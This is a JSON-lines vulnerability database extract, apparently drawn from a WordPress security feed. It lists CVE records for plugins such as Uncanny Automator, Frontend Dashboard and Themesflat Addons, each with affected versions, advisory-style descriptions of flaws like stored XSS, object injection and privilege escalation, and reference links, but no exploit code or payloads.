{"CVE_ID":"CVE-2025-3623","slug":"uncanny-automator","versionImpact":"6.4.0.1","description":"The Uncanny Automator plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 6.4.0.1 via deserialization of untrusted input in the automator_api_decode_message() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files.","refs":"[{\"url\":\"https:\\\/\\\/automatorplugin.com\\\/knowledge-base\\\/uncanny-automator-changelog\\\/#6-4-0-2-2025-04-18\",\"name\":\"https:\\\/\\\/automatorplugin.com\\\/knowledge-base\\\/uncanny-automator-changelog\\\/#6-4-0-2-2025-04-18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/lib\\\/helpers\\\/class-automator-recipe-helpers.php#L540\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/lib\\\/helpers\\\/class-automator-recipe-helpers.php#L540\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276577\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/lib\\\/helpers\\\/class-automator-recipe-helpers.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276577\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/lib\\\/helpers\\\/class-automator-recipe-helpers.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uncanny-automator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uncanny-automator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00bcfd8f-9785-449a-a0ea-16e2583d684a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00bcfd8f-9785-449a-a0ea-16e2583d684a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-39376","slug":"car-park-booking-system-for-wordpress","versionImpact":"2.6","description":"Missing Authorization vulnerability in QuanticaLabs Car Park Booking System for WordPress.This issue affects Car Park Booking System for WordPress: from n\/a through 2.6.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/car-park-booking-system-for-wordpress\\\/vulnerability\\\/wordpress-car-park-booking-system-for-wordpress-plugin-2-6-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/car-park-booking-system-for-wordpress\\\/vulnerability\\\/wordpress-car-park-booking-system-for-wordpress-plugin-2-6-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6290","slug":"tournament-bracket-generator","versionImpact":"1.0.0","description":"The Tournament Bracket Generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bracket' shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tournament-bracket-generator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tournament-bracket-generator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdde01aa-2d38-4085-b11a-ef8633ee928a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdde01aa-2d38-4085-b11a-ef8633ee928a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8071","slug":"mine-cloudvod","versionImpact":"2.1.10","description":"Mine CloudVod plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018audio\u2019 parameter in all versions up to, and including, 2.1.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mine-cloudvod\\\/tags\\\/2.1.10\\\/build\\\/audioplayer\\\/render.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mine-cloudvod\\\/tags\\\/2.1.10\\\/build\\\/audioplayer\\\/render.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mine-cloudvod\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mine-cloudvod\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f3cd194-3fb8-4dd9-905e-051d5de68b66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f3cd194-3fb8-4dd9-905e-051d5de68b66?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0369","slug":"gotowp","versionImpact":"5.1.1","description":"The GoToWP WordPress plugin through 5.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/351f31e0-cd13-4079-8fd1-447f319133c9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/351f31e0-cd13-4079-8fd1-447f319133c9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2084","slug":"essential-blocks","versionImpact":"4.0.6","description":"The Essential Blocks plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on the get function in versions up to, and including, 4.0.6. This makes it possible for subscriber-level attackers to obtain plugin settings. While a nonce check is present, it is only executed when a nonce is provided. Not providing a nonce results in the nonce verification to be skipped. There is no capability check.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0be8c668-0f1c-4f83-8a71-49c8bb9b67ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0be8c668-0f1c-4f83-8a71-49c8bb9b67ae?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3158","slug":"mail-control","versionImpact":"0.2.8","description":"The Mail Control plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 0.2.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77537eb8-1c84-4702-aba1-727b0de1c3e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77537eb8-1c84-4702-aba1-727b0de1c3e1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mail-control\\\/trunk\\\/includes\\\/admin.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mail-control\\\/trunk\\\/includes\\\/admin.php#L42\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1476","slug":"coming-soon-maintenance-mode-from-acurax","versionImpact":"2.6","description":"The Under Construction \/ Maintenance Mode from Acurax plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6 via the REST API. This makes it possible for unauthenticated attackers to obtain the contents of posts and pages when maintenance mode is active thus bypassing the protection provided by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f28c47e6-a37d-4328-afb2-6a9e6b3fe20a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f28c47e6-a37d-4328-afb2-6a9e6b3fe20a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/coming-soon-maintenance-mode-from-acurax\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/coming-soon-maintenance-mode-from-acurax\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1363","slug":"easy-accordion-free","versionImpact":"2.3.4","description":"The Easy Accordion \u2013 Best Accordion FAQ Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'accordion_content_source' attribute in all versions up to, and including, 2.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f2fa28-5bb2-4633-b2bc-27cc6a4e304c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f2fa28-5bb2-4633-b2bc-27cc6a4e304c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3044803%40easy-accordion-free&new=3044803%40easy-accordion-free&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3044803%40easy-accordion-free&new=3044803%40easy-accordion-free&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4212","slug":"themesflat-addons-for-elementor","versionImpact":"2.1.1","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's TF Group Image, TF Nav Menu, TF Posts, TF Woo Product Grid, TF Accordion, and TF Image Box widgets in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc686a35-4ce3-4359-a7d3-e6459e2f5dfe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc686a35-4ce3-4359-a7d3-e6459e2f5dfe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-tfgroupimage.php#L423\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-tfgroupimage.php#L423\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-clipping-mask.php#L619\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-clipping-mask.php#L619\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-navmenu.php#L1843\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-navmenu.php#L1843\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-posts.php#L3350\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-posts.php#L3350\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-woo-product-grid.php#L3646\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-woo-product-grid.php#L3646\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-accordion.php#L1158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-accordion.php#L1158\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-imagebox.php#L1313\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-imagebox.php#L1313\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themesflat-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themesflat-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1639","slug":"license-manager-for-woocommerce","versionImpact":"3.0.7","description":"The License Manager for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the showLicenseKey() and showAllLicenseKeys() functions in all versions up to, and including, 3.0.7. This makes it possible for authenticated attackers, with admin dashboard access (contributors by default due to WooCommerce) to view arbitrary decrypted license keys. The functions do perform a referer nonce check, but the nonce can be retrieved from the dashboard via the \"license\" JS variable, so it does not prevent the access.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92e444db-72d5-444f-811e-ade0bc097769?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92e444db-72d5-444f-811e-ade0bc097769?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/license-manager-for-woocommerce\\\/tags\\\/3.0.5\\\/includes\\\/Controllers\\\/License.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/license-manager-for-woocommerce\\\/tags\\\/3.0.5\\\/includes\\\/Controllers\\\/License.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9267","slug":"opt-in-hound","versionImpact":"1.4.3","description":"The Easy WordPress Subscribe \u2013 Optin Hound plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b91ec428-8444-4304-8901-4bc3ef146e3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b91ec428-8444-4304-8901-4bc3ef146e3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/opt-in-hound\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/opt-in-hound\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opt-in-hound\\\/trunk\\\/includes\\\/subscribers\\\/views\\\/view-submenu-page-subscribers.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opt-in-hound\\\/trunk\\\/includes\\\/subscribers\\\/views\\\/view-submenu-page-subscribers.php#L17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49231","slug":"wordpress-video","versionImpact":"1.0","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Peter CyClop WordPress Video allows Stored XSS. This issue affects WordPress Video: from n\/a through 1.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-video\\\/wordpress-wordpress-video-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-video\\\/wordpress-wordpress-video-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11279","slug":"schema-app-structured-data-for-schemaorg","versionImpact":"2.2.4","description":"The Schema App Structured Data plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.4. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/schema-app-structured-data-for-schemaorg\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/schema-app-structured-data-for-schemaorg\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48db673c-f978-45f4-9d7b-eddd81cee62e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48db673c-f978-45f4-9d7b-eddd81cee62e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12116","slug":"unlimited-theme-addons","versionImpact":"1.2.1","description":"The Unlimited Theme Addon For Elementor and WooCommerce plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.1 via the 'uta-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-theme-addons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-theme-addons\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dbdb6cc-2a00-4d34-9c11-62f3d1b51c73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dbdb6cc-2a00-4d34-9c11-62f3d1b51c73?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12451","slug":"html5-chat","versionImpact":"1.04","description":"The HTML5 chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'HTML5CHAT' shortcode in all versions up to, and including, 1.04 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-chat\\\/trunk\\\/index.php#L159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-chat\\\/trunk\\\/index.php#L159\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98de0a50-8464-4ea6-bf55-add9aab2d716?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98de0a50-8464-4ea6-bf55-add9aab2d716?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13581","slug":"simple-charts","versionImpact":"1.0","description":"The Simple Charts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'simple_chart' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-charts\\\/tags\\\/1.0\\\/simple-charts.php#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-charts\\\/tags\\\/1.0\\\/simple-charts.php#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dca2c66-64df-44c7-9c75-330dddf582c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dca2c66-64df-44c7-9c75-330dddf582c8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1404","slug":"secure-copy-content-protection","versionImpact":"4.4.7","description":"The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_sccp_reports_user_search() function in all versions up to, and including, 4.4.7. This makes it possible for unauthenticated attackers to retrieve a list of registered user emails.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secure-copy-content-protection\\\/tags\\\/4.4.6\\\/admin\\\/class-secure-copy-content-protection-admin.php#L943\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secure-copy-content-protection\\\/tags\\\/4.4.6\\\/admin\\\/class-secure-copy-content-protection-admin.php#L943\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secure-copy-content-protection\\\/tags\\\/4.4.6\\\/admin\\\/js\\\/secure-copy-content-protection-admin.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secure-copy-content-protection\\\/tags\\\/4.4.6\\\/admin\\\/js\\\/secure-copy-content-protection-admin.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246301\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246301\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/secure-copy-content-protection\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/secure-copy-content-protection\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7363b5de-db30-4b35-b701-5c8f2835ec6c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7363b5de-db30-4b35-b701-5c8f2835ec6c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4474","slug":"frontend-dashboard","description":"The Frontend Dashboard plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the fed_admin_setting_form_function() function in versions 1.0 to 2.2.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the plugin\u2019s 'register' role setting to make new user registrations default to the administrator role, leading to an elevation of privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/request\\\/admin.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/request\\\/admin.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/request\\\/tabs\\\/login.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/admin\\\/request\\\/tabs\\\/login.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290623\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290623\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frontend-dashboard\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frontend-dashboard\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb61159a-e501-4c55-a384-b6049e0f0bc8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb61159a-e501-4c55-a384-b6049e0f0bc8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6258","slug":"wp-soundsystem","versionImpact":"3.4.2","description":"The WP SoundSystem plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpsstm-track shortcode in all versions up to, and including, 3.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-soundsystem\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-soundsystem\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f027626a-471c-48aa-add6-7597254dcfa9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f027626a-471c-48aa-add6-7597254dcfa9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7966","slug":"get-youtube-subs","versionImpact":"3.5","description":"The Get Youtube Subs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'channel', 'layout', and 'subs_count' parameters in all versions up to, and including, 3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-youtube-subs\\\/trunk\\\/includes\\\/youtubesubs-class.php#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-youtube-subs\\\/trunk\\\/includes\\\/youtubesubs-class.php#L142\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/get-youtube-subs\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/get-youtube-subs\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a25728c-3d98-414b-bad0-2c05eb1f4ca2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a25728c-3d98-414b-bad0-2c05eb1f4ca2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
